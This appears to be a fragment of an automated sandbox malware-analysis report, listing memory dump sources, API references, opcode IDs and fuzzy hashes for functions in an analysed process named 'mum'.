                                      • Instruction Fuzzy Hash: 9841F670E01258CFDB18DFAAC5516AEFBF2AF88300F24D12AD519BB2A5DB345945CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E71DC
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 70bcd7d7c11ec77769449c87be733bc7ef02a89db4ba0277ea063d768c1cb7dd
                                      • Instruction ID: 9b20df78056e16779b72a5f70c251bc190f4f1b4750760265ca525cebb2c360a
                                      • Opcode Fuzzy Hash: 70bcd7d7c11ec77769449c87be733bc7ef02a89db4ba0277ea063d768c1cb7dd
                                      • Instruction Fuzzy Hash: 89410470D05248CFDB19DFAAD9546EEFBF2AF89300F24D12AD414AB2A9DB345945CF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E1273
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: b1d1c29b7147beac30b72cf58853a3adbd9dbf8efce25443417f66e55c881ec4
                                      • Instruction ID: 2c95b6fdf2f3bb72eb7978eef414ad82aedb9fd6e7ca754d5d89a2e8355b7bc1
                                      • Opcode Fuzzy Hash: b1d1c29b7147beac30b72cf58853a3adbd9dbf8efce25443417f66e55c881ec4
                                      • Instruction Fuzzy Hash: 2E41E270E01248CBDB19DFAAC85469EFBF2AF89300F24C12AD415BB3A9DB344945CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E056B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 60fd63970c8429f12863c2bd5dbfd93cd8f702d269f4536ef8af1ca13f9375fb
                                      • Instruction ID: 3e1f58e4060de554ed9c21a54d30b9a89ef10aca7883e8b75e347f526da44642
                                      • Opcode Fuzzy Hash: 60fd63970c8429f12863c2bd5dbfd93cd8f702d269f4536ef8af1ca13f9375fb
                                      • Instruction Fuzzy Hash: F041F370E05248CBDB19DFAAC95469EFBF2AF89304F24D12AD414BB3A9DB344945CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E8BEB
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 7aa3294dd929f98cf185316fa6c31ff925f2bff78165899c2e5cfa975587f1db
                                      • Instruction ID: 9f079dc2c127c0a6fa206d6b1f97e24e48643a39990a5e2547b206264ec3db35
                                      • Opcode Fuzzy Hash: 7aa3294dd929f98cf185316fa6c31ff925f2bff78165899c2e5cfa975587f1db
                                      • Instruction Fuzzy Hash: D641F570E01248CFDB19DFAAD94069EFBB2AF89304F24D12AD418BB7A5EB345945CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E1B23
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 80015beadfd81cad76bbce9f6d2958347c6d874648019e15e76b9c09a6d1dd43
                                      • Instruction ID: a999642ee0953bc87f13b5c4fc3ebc4b37514eca968911e1f629f31cb0df919e
                                      • Opcode Fuzzy Hash: 80015beadfd81cad76bbce9f6d2958347c6d874648019e15e76b9c09a6d1dd43
                                      • Instruction Fuzzy Hash: BA41D370E01248CBDB19DFAAC5506EEBBF2AF89304F24D12AD414BB7A9DB345949CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E9043
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 47f11a003d729b51a69bb3540f331942a194bb62cd3ff3a71e05313a75e8055e
                                      • Instruction ID: ec6c99e558a1af3b1255c0be663a7c6c1ddad2f12a421350f94070d9534b254e
                                      • Opcode Fuzzy Hash: 47f11a003d729b51a69bb3540f331942a194bb62cd3ff3a71e05313a75e8055e
                                      • Instruction Fuzzy Hash: CD41E374E00248CBEB19DFAAD8546DEBBB2AF88304F24C12AD418BB7A5DB344945CF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E57A3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 4ab30d803f4246cb7849e8b5cf94cce63763ebf98fef59a39a0b30ab42d7c69c
                                      • Instruction ID: bebb5e15fe64670dac5eedbd128fe1ff94c49c405d09b80fbb2e1a8f853af6c3
                                      • Opcode Fuzzy Hash: 4ab30d803f4246cb7849e8b5cf94cce63763ebf98fef59a39a0b30ab42d7c69c
                                      • Instruction Fuzzy Hash: 6C41E270E05648CFDB19DFAAD45069EFBB2AF88304F24D12AD414BB2A9DB344945CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E0E1B
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 788eed8543d73d8c83cf0144a08737f272d1ce7bac1856c1ba41e53cf4faaabb
                                      • Instruction ID: a36e5713c73e98237fb8a246912ef4cba15b28bd8af1190a8748b542e1c40c5c
                                      • Opcode Fuzzy Hash: 788eed8543d73d8c83cf0144a08737f272d1ce7bac1856c1ba41e53cf4faaabb
                                      • Instruction Fuzzy Hash: 10410270E05248CBDB19DFAAD8506AEFBF2AF88300F24D12AC414BB3A9DB344945CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 003E16CB
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_3e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 68895af53a9dfbfb4d9492122c720df7976a69953b3d23a75f2084745339a1fd
                                      • Instruction ID: 8bf96f6c8d0427a1fc56a346cd1a5b5cbec85e3aa5ed67e7b487d0e808a721df
                                      • Opcode Fuzzy Hash: 68895af53a9dfbfb4d9492122c720df7976a69953b3d23a75f2084745339a1fd
                                      • Instruction Fuzzy Hash: F841E470E01258CBDB19DFAAC5546AEFBF2AF89300F24D22AD414BB3A5DB345949CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e9047b0b2d892f855b9d9482799bd8a9285e0fb441eaec3331c74c682614ceb0
                                      • Instruction ID: 5716f7e329ad4f2f8cc130bc4e47a72dc35ffabf07961f4e8587c268d4d8adda
                                      • Opcode Fuzzy Hash: e9047b0b2d892f855b9d9482799bd8a9285e0fb441eaec3331c74c682614ceb0
                                      • Instruction Fuzzy Hash: 3EE10174E00258CFDB14DFA4C994B9DBBB2BF89304F2481AAD809AB365DB315A85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: eefb7c21458f58b282e08dcbb70ede23205f89e14b88d98df3bd465c2b180fc9
                                      • Instruction ID: 7bd5aedf8124892da41805421f118e5e1da1d07ffce736f151b8d29665eacda4
                                      • Opcode Fuzzy Hash: eefb7c21458f58b282e08dcbb70ede23205f89e14b88d98df3bd465c2b180fc9
                                      • Instruction Fuzzy Hash: D5D1E274E10218CFDB14DFA5C994BADBBB2BF89304F2091AAD409AB355DB359E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 8c906c2bde32346b99f7508a21141c8603c96d13e0f7bf20f57ef4bf4273d48a
                                      • Instruction ID: 676aab372966d66a33a799c0531b7a791f7091ac8c6983a93522b72222cd7672
                                      • Opcode Fuzzy Hash: 8c906c2bde32346b99f7508a21141c8603c96d13e0f7bf20f57ef4bf4273d48a
                                      • Instruction Fuzzy Hash: A2D1E474E10218CFDB14DFA5C994B9DBBB2BF89304F2081AAD409AB355DB355E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: aa72cc9b76e178c7fd5c01058aa515bbe8559e6d49a3bda357dcb71a1eceae8f
                                      • Instruction ID: a02cb707d787162696db9afa34ac0c86f6b719c65438ce783dfcdafe49f0f04c
                                      • Opcode Fuzzy Hash: aa72cc9b76e178c7fd5c01058aa515bbe8559e6d49a3bda357dcb71a1eceae8f
                                      • Instruction Fuzzy Hash: CCC1E274E10218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB355DB359E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d00abb0eae58db431ff3a84c7aa96dbd42d948a27651832ad8d3a6105350048b
                                      • Instruction ID: 911193e0aeb2fb0bfb0247ddc90e05286b3e6f773144ba6cb16eef2ab71881a6
                                      • Opcode Fuzzy Hash: d00abb0eae58db431ff3a84c7aa96dbd42d948a27651832ad8d3a6105350048b
                                      • Instruction Fuzzy Hash: C0D10374E10218CFDB14DFA5C994B9DBBB2BF89304F2081AAD809AB365DB355E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 14f2532b9a39fa36b7b26f679e730a08ddba32fc7bddf7e57e21baf04267d83f
                                      • Instruction ID: 8d9ea5abd692a6cf5ee1c617bfd1b221d65e0ce887013e98013dbf805e11ffc2
                                      • Opcode Fuzzy Hash: 14f2532b9a39fa36b7b26f679e730a08ddba32fc7bddf7e57e21baf04267d83f
                                      • Instruction Fuzzy Hash: 9EC1D374E10218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB355DB359E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 6ae48e2bbdde9f7e93402003280ac05ffe5f57961395d42c61549d6cdfac84d3
                                      • Instruction ID: 0224469fe60e91120411f6fcc4b1306847847ad34ac2083bad2bc34d4a50322b
                                      • Opcode Fuzzy Hash: 6ae48e2bbdde9f7e93402003280ac05ffe5f57961395d42c61549d6cdfac84d3
                                      • Instruction Fuzzy Hash: B6C1F474E10218CFDB14DFA5C994B9DBBB2BF89304F2481AAD809AB355DB359E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a33461aafda98d4e12974a02c78bbe8fc0995b820fe1b2be2fed8e6237c866f8
                                      • Instruction ID: d0ded39c1caeb114399d47a1502885816a3f3bedb86c50d8320e24adaa0df230
                                      • Opcode Fuzzy Hash: a33461aafda98d4e12974a02c78bbe8fc0995b820fe1b2be2fed8e6237c866f8
                                      • Instruction Fuzzy Hash: 9AC1E274E10218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB355DB359E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: bcb8e9622ddcad6180ceebfb71e5f0a0c283002b7c1e60dbf3eddcba53698d9f
                                      • Instruction ID: 831d8a0a92e1ba31ddaf964752b08f05b993239fcbf187424ab3034b27dd4836
                                      • Opcode Fuzzy Hash: bcb8e9622ddcad6180ceebfb71e5f0a0c283002b7c1e60dbf3eddcba53698d9f
                                      • Instruction Fuzzy Hash: 4EC1E274E10218CFDB54DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4ebfeb17c97d498fb9ea20a6913804172b6eddabb573ce5a03be2a109d2b67e7
                                      • Instruction ID: 21c4a8ceccb9e07e32cd846d936077c954bc15fb27abbddd263a9dad53dd360c
                                      • Opcode Fuzzy Hash: 4ebfeb17c97d498fb9ea20a6913804172b6eddabb573ce5a03be2a109d2b67e7
                                      • Instruction Fuzzy Hash: FCC1D174E10218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB355DB359E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: f3c0a97e46107e65545b211e4abf66800149964c0478d75e616c067d22a0ad1b
                                      • Instruction ID: 29b4bb20ce25f931cbe64bb36499ccac6fab2ff3c6f3d450c71d75156d97a5f1
                                      • Opcode Fuzzy Hash: f3c0a97e46107e65545b211e4abf66800149964c0478d75e616c067d22a0ad1b
                                      • Instruction Fuzzy Hash: EAC1D374E10218CFDB14DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b16c26bc6e9234e6afd7cfd18738579659f774edb95807fcfeb1e6e79e8b5f5a
                                      • Instruction ID: 07c0a2b725948733db3d984fa30a796f31a4433d3d6b724cdb320d8a4b31164f
                                      • Opcode Fuzzy Hash: b16c26bc6e9234e6afd7cfd18738579659f774edb95807fcfeb1e6e79e8b5f5a
                                      • Instruction Fuzzy Hash: 62D1F374E10218CFDB14DFA5D994B9DBBB2BF89304F2091AAD809AB365DB345E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 769f869fecae195ef31460d917fd1f278d5927081fbbbe6d7470de17d4d47f00
                                      • Instruction ID: d07f7b123506250aa41112961dcc523923b8d3d000c0f553c3260ea764726728
                                      • Opcode Fuzzy Hash: 769f869fecae195ef31460d917fd1f278d5927081fbbbe6d7470de17d4d47f00
                                      • Instruction Fuzzy Hash: FBC1D374E10218CFDB14DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 06f1b0d1c1286902aaae7374cc24c60af1adf57fdd3b01531d52128116a2aa75
                                      • Instruction ID: cb1695b6185cd6505434b79e4be213cb53913c80150560cca3421944e8c06c91
                                      • Opcode Fuzzy Hash: 06f1b0d1c1286902aaae7374cc24c60af1adf57fdd3b01531d52128116a2aa75
                                      • Instruction Fuzzy Hash: 8DD10374E10218CFDB14DFA5C994B9DBBB2BF88304F2081AAD809AB365DB345E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 81b63294b02b79a0b9577ed802f056563cfaf384e0360fce359ea01c32395051
                                      • Instruction ID: 0f12f6687b7b8f8c3ac3799bb94f54814aee4f51b8f3d2c4a15025f8771690e0
                                      • Opcode Fuzzy Hash: 81b63294b02b79a0b9577ed802f056563cfaf384e0360fce359ea01c32395051
                                      • Instruction Fuzzy Hash: 24C1D374E10218CFDB14DFA5D994B9DBBB2BF89304F2081AAD809AB355DB359E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5e871d3782a66e5a94a582cc2c45dae6850994d7c147b5e757326416f591b203
                                      • Instruction ID: 731af546ba7ed0b8784d845e823e60ffb761a53b0107bb213c166cb0ef9253b9
                                      • Opcode Fuzzy Hash: 5e871d3782a66e5a94a582cc2c45dae6850994d7c147b5e757326416f591b203
                                      • Instruction Fuzzy Hash: B6D1E274E10218CFDB14DFA5D994B9DBBB2BF89304F2091AAD809AB355DB349E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: f5d7f7896324f76e157e3124216a8a5fc8c63c3987c759bcde1b202f742dd22c
                                      • Instruction ID: 8933abf1942a64fcce547302818a340ea6b8246063d5e19fb104ab7eef4f872d
                                      • Opcode Fuzzy Hash: f5d7f7896324f76e157e3124216a8a5fc8c63c3987c759bcde1b202f742dd22c
                                      • Instruction Fuzzy Hash: 2AC1D374E10218CFDB14DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 5829e31506eea6dc950447d47a6bef6b8637057d9ce60a8e1caa7b0c6733243f
                                      • Instruction ID: 0b54370309306cd69effd4dc06c54f359661c00290a903601550ccb07f09108e
                                      • Opcode Fuzzy Hash: 5829e31506eea6dc950447d47a6bef6b8637057d9ce60a8e1caa7b0c6733243f
                                      • Instruction Fuzzy Hash: A7C1E374E10218CFDB54DFA5C994B9DBBB2BF89304F2081AAD809AB355DB355E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: a4044d979d3b8f06063d8e90167786a27836bbdddeb2bc9820c612b21f968db3
                                      • Instruction ID: 4654f357f93f256770d947025dd29b9f6ae85d4af74c88ff39a856ad22b18bd1
                                      • Opcode Fuzzy Hash: a4044d979d3b8f06063d8e90167786a27836bbdddeb2bc9820c612b21f968db3
                                      • Instruction Fuzzy Hash: 46C1E374E10218CFDB54DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b8701ea3c602e6360ef6c00f30d52b9bab6ccf689105715c7b9e3d2a351b3985
                                      • Instruction ID: d8286f2b6b749b461b57b3e3a1f17f5e2550a007e5ee5f9cd616348b280fb8c9
                                      • Opcode Fuzzy Hash: b8701ea3c602e6360ef6c00f30d52b9bab6ccf689105715c7b9e3d2a351b3985
                                      • Instruction Fuzzy Hash: 28A11574D10208CFDB14DFA9C984BDDBBB1BF88314F249269E509AB3A1DB709988CF55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 53547ae15153e2d51d0bb945c55153d7c73422b1ed428826b52bcf68567ef6cf
                                      • Instruction ID: 5c8bdafec882aff6b8936574a65a211eeb8e784131f038d95bbc8e77a14bc0a1
                                      • Opcode Fuzzy Hash: 53547ae15153e2d51d0bb945c55153d7c73422b1ed428826b52bcf68567ef6cf
                                      • Instruction Fuzzy Hash: 5D91F274D10208CFDB10DFA9C884BEDBBB1BF48314F249269E509BB291DB759A88CF55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL(000000FF), ref: 002CBD5A
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: be28dc0d70ee774896ca0001398661176ed18f871aee912647e4d442770b5053
                                      • Instruction ID: b43515a2976bb3b39a1282ebd1be7130d2e8d7b38847bd906b808d4d071d6007
                                      • Opcode Fuzzy Hash: be28dc0d70ee774896ca0001398661176ed18f871aee912647e4d442770b5053
                                      • Instruction Fuzzy Hash: 825113B4D10208CFDB18CFAAD848BDDBBB2BF89314F24D62AE415AB294D7749945CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7e8975139b6724760d17ce5d08534419634c48f6978c0ffab4b8749b469ba483
                                      • Instruction ID: 8638d35968fd843e0c431c78a5ec4706b78381245636039455fd5b3ac1c1dccc
                                      • Opcode Fuzzy Hash: 7e8975139b6724760d17ce5d08534419634c48f6978c0ffab4b8749b469ba483
                                      • Instruction Fuzzy Hash: D7510EB4D24208CFCF15CFA9D485BECBBB1BF49324F209629E016AB294D7749885CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.1275732887.000000000026D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0026D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_26d000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
